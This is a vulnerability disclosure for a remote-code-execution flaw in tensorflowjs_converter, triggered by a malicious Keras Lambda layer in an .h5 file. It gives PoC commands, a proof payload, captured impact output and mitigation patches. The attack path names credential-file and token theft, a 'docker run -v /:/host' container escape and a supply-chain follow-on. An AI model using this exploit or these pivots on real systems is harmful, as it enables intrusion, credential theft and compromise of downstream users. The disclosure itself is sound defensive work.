F-8: Arbitrary Python execution in tensorflowjs_converter via Keras 2 Lambda layer marshal-loads inside untrusted .h5
Authorized security research artifact disclosed via huntr.com's
TensorFlow.js Model Format Vulnerability program.
Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.
Summary
The absence of any class_name == 'Lambda' allow-list check before
tf_keras.models.load_model(h5_path, compile=False) in
tfjs-converter/python/tensorflowjs/converters/converter.py:227
allows any attacker who can place a .h5 file at the converter's input path
(for example via a PR contribution, a model-registry upload, an email/Slack
attachment, or a malicious npm prepare script) to execute arbitrary Python in
the converter process, with the full filesystem, environment, subprocess, and
network capabilities of the runner. The Keras 3 safe_mode=True fix
(keras-team/keras#18549)
closes this primitive at the upstream loader, but the tfjs converter
depends on tf_keras (the legacy Keras 2 fork), which does not expose
safe_mode at all, and tfjs has never added an equivalent JSON-walk guard.
The same root cause is reached via four distinct CLI flags (--input_format=keras,
keras_saved_model, tfjs_layers_model --output_format=keras*, keras_keras),
so a fix at any single load_model call does not close the vulnerability:
the guard must live at the JSON-config validation layer.
The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or
a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds
the additional reconnaissance payload that produces the captured
F8_REAL_IMPACT_PROOF document below.
Root Cause
Lines of Code:
- tfjs-converter/python/tensorflowjs/converters/converter.py:227 (--input_format=keras)
- tfjs-converter/python/tensorflowjs/converters/converter.py:278 (--input_format=keras_saved_model)
- tfjs-converter/python/tensorflowjs/converters/keras_tfjs_loader.py:66 and :130 (--input_format=tfjs_layers_model --output_format=keras*)
In converter.py:227:
model = tf_keras.models.load_model(h5_path, compile=False)
tf_keras.layers.Lambda.from_config(config) (the call load_model makes when
it sees class_name: "Lambda" in the layer table) reconstructs the layer's
function field via:
# tf_keras/keras/src/layers/core/lambda_layer.py
raw = base64.b64decode(config['function'][0])
code = marshal.loads(raw) # CWE-502 sink
fn = types.FunctionType(code, globals(), name, defaults, closure)
fn is then invoked at least three times per converter invocation:
- Layer-build time, immediately after from_config returns.
- First predict() call inside the converter's _topological_sort_validate(...) step.
- Re-serialization to the output .h5 (when --output_format=keras is used).
The compile=False argument that the converter passes does not affect
Lambda deserialization: compile=False only suppresses optimizer / loss
reconstruction; layer instantiation runs unchanged.
Why this is NOT a duplicate of the Keras 3 safe_mode fix
(keras-team/keras#18549):
Keras 3 added safe_mode=True as the default for keras.models.load_model.
When safe_mode=True, Lambda.from_config raises
ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True").
That fix does not propagate to tfjs's converter because the converter
imports tf_keras (the legacy Keras 2 fork pinned via
tensorflowjs==4.22.0 -> tf_keras==2.21.0). tf_keras.models.load_model
does not accept a safe_mode parameter: calling
tf_keras.models.load_model(h5_path, safe_mode=True) raises
TypeError: load_model() got an unexpected keyword argument 'safe_mode'.
tfjs has never added an equivalent JSON-walk guard. The disclosure surface is
therefore in the tfjs project, not Keras.
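A wrapper that wants to rely on safe_mode could first check whether the installed loader actually exposes that keyword. The following is a minimal sketch, not part of tfjs: `accepts_keyword` is a hypothetical helper, and the two `load_model_*` functions are local stand-ins that only mimic the signatures described above (the real tf_keras and keras loaders are not imported here).

```python
import inspect


def accepts_keyword(func, name):
    """Return True if `func` declares `name` as an explicit keyword parameter."""
    params = inspect.signature(func).parameters
    # A **kwargs catch-all is deliberately not counted: it would accept the
    # keyword syntactically without proving the loader honours it.
    return name in params and params[name].kind in (
        inspect.Parameter.POSITIONAL_OR_KEYWORD,
        inspect.Parameter.KEYWORD_ONLY,
    )


# Stand-ins for the two loader signatures discussed above (assumptions).
def load_model_keras2_style(filepath, custom_objects=None, compile=True, options=None):
    return "loaded"


def load_model_keras3_style(filepath, custom_objects=None, compile=True, safe_mode=True):
    return "loaded"


print(accepts_keyword(load_model_keras2_style, "safe_mode"))  # False
print(accepts_keyword(load_model_keras3_style, "safe_mode"))  # True
```

A check like this only tells the caller that the keyword exists; when it does not, the caller still needs a separate guard before loading.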
Internal Pre-conditions
- The victim runs tensorflowjs_converter (Python): directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API.
- The victim's environment has tensorflowjs installed (any version), which transitively installs tf_keras (a hard runtime dependency in tensorflowjs.egg-info/requires.txt).

Both conditions hold by definition for any system running the converter: there is no version, no configuration, and no environment in which the bug does not reproduce.
External Pre-conditions
The attacker can place a .h5 artifact at any location the converter reads.
Concrete delivery channels observed in real CI/CD setups:
- PR contribution: attacker opens a PR adding models/new_pretrained.h5 to a repository whose CI step converts every .h5 it sees.
- Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
- Slack / email with a "please convert this for me" attachment.
- Maintenance bucket the converter reads via --input_path=s3://....
- npm package prepare script that calls tensorflowjs_converter against an attacker-controlled URL.
No authentication to the victim's systems is required.
Attack Path
1. Attacker builds evil.h5 (9 224 bytes; the bundled reproduce.py reproduces it deterministically) containing one Lambda layer whose function is base64(marshal.dumps(attacker_code)). The attacker_code variable in reproduce.py is the closure-free code object:

       attacker_src = """
       import os
       with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f:
           f.write('END2END_RCE pid=%d uid=%d cwd=%s' % (os.getpid(), os.getuid(), os.getcwd()))
       """

   The "no free variables" property makes the bytecode portable across tf_keras 2.19 and tf_keras 2.21+ venvs; the same evil.h5 reproduces in every venv we tested.
2. Attacker delivers evil.h5 via any of the channels above.
3. Victim's CI step runs:

       - run: pip install tensorflowjs==4.22.0
       - run: tensorflowjs_converter --input_format=keras evil.h5 ./out

4. converter.py:227 invokes tf_keras.models.load_model(h5_path, compile=False).
5. tf_keras instantiates the Lambda layer; marshal.loads(...) constructs the attacker code, types.FunctionType wraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:
   - filesystem: read /etc/passwd, /proc/version, ~/.npmrc, ~/.ssh/id_rsa, ~/.docker/config.json, ~/.aws/credentials;
   - environment: read $GITHUB_TOKEN, $NPM_TOKEN, $AWS_*, $HF_TOKEN;
   - subprocess: os.system, subprocess.run(['id']), ['hostname'], ['docker', 'run', '-v', '/:/host', ...] when the runner is in the docker group;
   - network: outbound DNS + TCP via socket.gethostbyname(...), urllib.request.urlopen(...).
6. The same Lambda fires two more times in the same invocation: at the first predict() and at output .h5 re-serialization. Even a maintainer patch that adds a try/except only around step 4 leaves steps 5/6 reachable.
7. Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious tensorflowjs release (or @tensorflow/tfjs on npm) with the captured $NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.
Impact
Concrete primitives demonstrated by the bundled PoC (captured against the
sanitized /tmp/victim_host/ synthetic CI-runner lab β see
F8_REAL_IMPACT_PROOF_2026-06-11.txt):
| Primitive | What the PoC actually captured | What it means on a real runner |
|---|---|---|
| arbitrary Python in process | END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab written by the Lambda payload at load time | full RCE; every subsequent row is a corollary |
| /etc/passwd read | 187 B recovered byte-perfect through open('/etc/passwd').read() inside the Lambda | runner user discovery, group enumeration |
| /proc/self/cgroup read | 0::/system.slice/runner.slice/runner.scope recovered | tenant fingerprinting on shared CI |
| /proc/version read | sanitized synthetic kernel string recovered | kernel-CVE exploitation pivot |
| subprocess id | uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker) | docker group = container escape via docker run -v /:/host on self-hosted GH Actions / GitLab runners |
| subprocess hostname | ci-runner-01 recovered | C2 telemetry / lateral-movement target identification |
| DNS resolution | example.com -> 93.184.215.14 | outbound network present; exfil + C2 channels open |
| env var read (real-runner extrapolation) | not captured against sanitized lab; trivially reachable via os.environ.get('GITHUB_TOKEN') | $GITHUB_TOKEN -> push malicious tag -> supply-chain attack on every downstream tfjs consumer |
The same payload reaches every CLI entry point (see Root Cause). A
maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the
bug shipping via three other documented flags; see the Extended Impact
section below.
Extended Impact: same-root-cause manifestations
| Variant | CLI flag | Source line | Why a converter.py:227-only patch misses it |
|---|---|---|---|
| Direct Keras .h5 | --input_format=keras | converter.py:227 | the primary path |
| keras_saved_model .h5 | --input_format=keras_saved_model | converter.py:278 | strictly worse: no compile=False |
| Round-trip tfjs_layers -> keras | --input_format=tfjs_layers_model --output_format=keras* | keras_tfjs_loader.py:66, :130 | same primitive via model_from_json (no .h5, just model.json) |
| Keras 3 zip | --input_format=keras_keras | converter.py:147 -> walk config.json | same primitive via Keras 3 zip with malicious internal config.json |
The mitigation has to be applied at the JSON-config validation layer (refuse any
class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit
opt-in), not at any single load_model call.
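Because two of the variants above never touch an .h5 file, a config-layer guard first has to pull the JSON config out of each container format without instantiating any layer. The sketch below shows that extraction step for a tfjs layers-model model.json and for a Keras 3 zip, using only the standard library. The helper names are hypothetical, and the "modelTopology" key and the "config.json" member name are assumptions about the two formats rather than something taken from the converter source.

```python
import io
import json
import zipfile


def config_from_tfjs_model_json(text):
    """Return the topology/config part of a tfjs layers-model model.json."""
    doc = json.loads(text)
    # Assumption: the Keras config sits under "modelTopology". Fall back to
    # the whole document so an unexpected layout is still inspected.
    if isinstance(doc, dict) and "modelTopology" in doc:
        return doc["modelTopology"]
    return doc


def config_from_keras_zip(fileobj):
    """Return the parsed config.json from a Keras 3 zip archive."""
    with zipfile.ZipFile(fileobj) as archive:
        return json.loads(archive.read("config.json"))


# Demo inputs built in memory; no model is loaded and no layer is created.
model_json = json.dumps({
    "format": "layers-model",
    "modelTopology": {"model_config": {"class_name": "Sequential", "config": {"layers": []}}},
    "weightsManifest": [],
})
tfjs_cfg = config_from_tfjs_model_json(model_json)

buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("config.json", json.dumps(
        {"class_name": "Sequential", "config": {"layers": [{"class_name": "Lambda"}]}}))
buffer.seek(0)
keras_cfg = config_from_keras_zip(buffer)

print(tfjs_cfg["model_config"]["class_name"])              # Sequential
print(keras_cfg["config"]["layers"][0]["class_name"])      # Lambda
```

Each returned object is plain parsed JSON, so the class_name check described above can run on it before any load_model or model_from_json call.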
PoC
git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc
# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"
# Option A: exercise the EXACT converter codepath in one process
python reproduce.py
# Option B: exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out
# Option C: capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py
Expected output: Option A (reproduce.py)
============================================================
PoC F-8 (end-to-end) - Real .h5 RCE through tf_keras.load
============================================================
attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
Lambda layer config function field (truncated):
class : Lambda name : evil_lambda
function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
Now exercising the EXACT call tfjs-converter makes:
converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
[F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
END-TO-END RCE PROVEN
proof file content : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab
The Lambda function fires three times per execution (build, load, predict); no single code path gates the deserialization.
Expected output: Option C (reproduce_real_impact.py)
Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:
===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab
--- 2) Host filesystem readout ---
/etc/passwd:
root:x:0:0:DEMO_ROOT:/root:/bin/bash
runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
...
/etc/hostname:
ci-runner-01
/proc/self/cgroup:
0::/system.slice/runner.slice/runner.scope
/proc/version:
Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO
--- 3) Subprocess execution ---
$ id -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
$ hostname -> ci-runner-01
--- 4) Network reachability ---
socket.gethostbyname(example.com) -> 93.184.215.14
The docker group membership on the runner is the container-escape pivot:
the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...])
to take over the host.
Mitigation
Three options, in order of strength:
Option 1: Migrate the converter dependency from tf_keras to Keras 3
Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py
with import keras and call keras.models.load_model(h5_path, safe_mode=True).
This is the upstream-blessed mitigation and eliminates the primitive entirely.
# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras  # was: import tf_keras
model = keras.models.load_model(h5_path,
                                compile=False,
                                safe_mode=True)  # NEW: blocks Lambda
After the fix, the check at the Lambda deserialization sink becomes, in simplified form:
# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
    raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")
evil.h5 no longer loads; the converter raises ValueError instead of
running attacker bytecode.
Option 2: Add a pre-load JSON config walk (single central guard)
If a tf_keras -> keras migration is too disruptive, one central guard before
any load_model / model_from_json call covers all four CLI entry points:
# tfjs-converter/python/tensorflowjs/converters/converter.py
import json
import os

import h5py
import tf_keras

_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')

def _refuse_unsafe_lambda(model_config_json: dict):
    """Raise if the parsed model config contains an unsafe layer class."""
    # Explicit opt-in for callers who trust the model source.
    if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
        return

    def walk(node):
        # Recurse through every dict and list so nested layers are covered.
        if isinstance(node, dict):
            cn = node.get('class_name')
            if cn in _UNSAFE_CLASSES:
                raise RuntimeError(
                    'Refusing to load Keras "%s" layer from untrusted source; '
                    'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)

    walk(model_config_json)

# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
    _refuse_unsafe_lambda(json.loads(f.attrs['model_config']))
model = tf_keras.models.load_model(h5_path, compile=False)
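For triage it can help to report where in the config an unsafe class appears, not only that one exists, since a Lambda can sit inside a wrapper layer's nested config. The following is a small standalone sketch of such a reporting walk. `find_unsafe_layers` and the sample config are hypothetical and exist only for illustration; they are not part of the converter.

```python
UNSAFE_CLASSES = ("Lambda", "TensorFlowOpLayer")


def find_unsafe_layers(node, path="$"):
    """Yield (path, class_name) for every unsafe class_name in a parsed config."""
    if isinstance(node, dict):
        class_name = node.get("class_name")
        if class_name in UNSAFE_CLASSES:
            yield path, class_name
        for key, value in node.items():
            yield from find_unsafe_layers(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_unsafe_layers(value, f"{path}[{index}]")


# Hypothetical config: the Lambda is nested inside a wrapper layer.
config = {
    "class_name": "Sequential",
    "config": {
        "layers": [
            {"class_name": "Dense", "config": {"units": 4}},
            {
                "class_name": "TimeDistributed",
                "config": {"layer": {"class_name": "Lambda", "config": {"name": "inner"}}},
            },
        ]
    },
}

hits = list(find_unsafe_layers(config))
print(hits)  # [('$.config.layers[1].config.layer', 'Lambda')]
```

A check that only inspects the top-level layers list would miss this case, which is why the walk recurses through every dict and list.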
Option 3: Refuse .h5 entirely for untrusted input
Most disruptive but simplest to audit: gate the converter to accept only TF
SavedModel and TFJS layers-model formats unless TFJS_UNSAFE_KERAS_LOAD=1 is
set.
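One way to picture this gate is an allow-list check on the --input_format value that runs before any file is opened. The sketch below assumes that "tf_saved_model" and "tfjs_layers_model" are the format names to allow, and `check_input_format` is a hypothetical helper; neither is taken from the converter source.

```python
import os

# Assumption: the --input_format values accepted without opt-in.
SAFE_INPUT_FORMATS = frozenset({"tf_saved_model", "tfjs_layers_model"})
OPT_IN_ENV_VAR = "TFJS_UNSAFE_KERAS_LOAD"


def check_input_format(input_format, environ=None):
    """Raise ValueError for Keras-style inputs unless the caller opted in."""
    environ = os.environ if environ is None else environ
    if input_format in SAFE_INPUT_FORMATS:
        return
    if environ.get(OPT_IN_ENV_VAR) == "1":
        return
    raise ValueError(
        "Refusing --input_format=%s for untrusted input; set %s=1 to bypass."
        % (input_format, OPT_IN_ENV_VAR))


check_input_format("tf_saved_model", environ={})           # allowed
check_input_format("keras", environ={OPT_IN_ENV_VAR: "1"})  # explicit opt-in

try:
    check_input_format("keras", environ={})
except ValueError as err:
    print("blocked:", err)
```

Note that this gate on its own does not cover the tfjs_layers_model round-trip to a Keras output format listed under Extended Impact; that path would still need a config-level check.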
Defense-in-depth alternatives
- Sandbox the converter step in CI under --cap-drop=all, no docker socket, no outbound network. Closes step 7 of the Attack Path even when the underlying primitive remains.
- Run converter under a dedicated low-privilege user that has no registry-publish credentials in environment.
- Sign + verify .h5 artifacts with sigstore so only the source repo's pipeline can produce them.
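As an illustration of the "no registry-publish credentials in environment" point, a CI wrapper could strip credential-bearing variables before spawning the converter. This is a minimal sketch under stated assumptions: `scrub_environment` is a hypothetical helper, and the pattern list simply mirrors the variables named in the Attack Path. It reduces what a payload can read from the environment; it does not remove the deserialization primitive and does not protect credential files on disk.

```python
import fnmatch

# Variables named in the Attack Path; extend for the pipeline at hand.
SECRET_PATTERNS = ("GITHUB_TOKEN", "NPM_TOKEN", "HF_TOKEN", "AWS_*")


def scrub_environment(environ, patterns=SECRET_PATTERNS):
    """Return a copy of `environ` without variables matching any pattern."""
    return {
        name: value
        for name, value in environ.items()
        if not any(fnmatch.fnmatchcase(name, pattern) for pattern in patterns)
    }


sample = {
    "PATH": "/usr/bin",
    "LANG": "C",
    "GITHUB_TOKEN": "redacted",
    "NPM_TOKEN": "redacted",
    "AWS_SECRET_ACCESS_KEY": "redacted",
}
clean = scrub_environment(sample)
print(sorted(clean))  # ['LANG', 'PATH']
```

The result can be passed as the `env` argument of `subprocess.run` when invoking tensorflowjs_converter. A deny-list like this is weaker than starting from an empty environment and adding back only what the converter needs.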
The single-line safe_mode=True fix in Option 1 closes the primitive at the
deserialization sink and is the upstream-blessed mitigation; Option 2 is the
recommended in-place patch for projects that can't migrate tf_keras ->
keras immediately.
CVSS 3.1: 9.6 / Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
| Metric | Value | Justification |
|---|---|---|
| AV:N | Network | artifact arrives over any network channel (PR, registry, email) |
| AC:L | Low | one Lambda layer in the JSON config |
| PR:N | None | no auth on the victim's systems required |
| UI:R | Required | victim must invoke the converter |
| S:C | Changed | attacker takes the entire pipeline environment beyond the converter process |
| C:H / I:H / A:H | High / High / High | full process compromise |
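The 9.6 figure can be re-derived from the vector string with the CVSS v3.1 base-score equations. The sketch below implements only the base metrics (no temporal or environmental scoring); the function and table names are illustrative, and the weights are the published v3.1 constants.

```python
import math

WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on Scope: (unchanged, changed).
PR_WEIGHTS = {"N": (0.85, 0.85), "L": (0.62, 0.68), "H": (0.27, 0.5)}


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS v3.1 base score for a full base vector string."""
    parts = vector.split("/")
    if parts[0] != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    m = dict(part.split(":") for part in parts[1:])
    changed = m["S"] == "C"
    pr = PR_WEIGHTS[m["PR"]][1 if changed else 0]
    iss = 1 - ((1 - WEIGHTS["C"][m["C"]])
               * (1 - WEIGHTS["I"][m["I"]])
               * (1 - WEIGHTS["A"][m["A"]]))
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

With Scope changed, the raw sum of impact and exploitability is multiplied by 1.08 before rounding up, which is how UI:R still lands at 9.6.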
Files in this repository
| File | Purpose |
|---|---|
| README.md | this disclosure |
| evil.h5 | minimal malicious model (9 224 B) that triggers RCE on tf_keras.models.load_model |
| evil_real_impact.h5 | enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda |
| reproduce.py | Option A: self-contained builder + RCE-trigger script (exercises the exact converter codepath) |
| reproduce_real_impact.py | Option C: builds and runs the full impact-readout variant |
| F8_REAL_IMPACT_PROOF_2026-06-11.txt | sanitized captured proof from running Option C against /tmp/victim_host/ lab |
Cross-references
- Keras safe_mode PR: https://github.com/keras-team/keras/pull/18549
- Keras Security docs: "Loading a Keras model whose config contains a Lambda layer in safe_mode=False is equivalent to running arbitrary code."
- Matches huntr program example: "Arbitrary Code Execution on Inference Through Keras Lambda Layers in hdf5", but in a distinct affected component (tensorflowjs_converter, not Keras directly).
Disclosure
Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.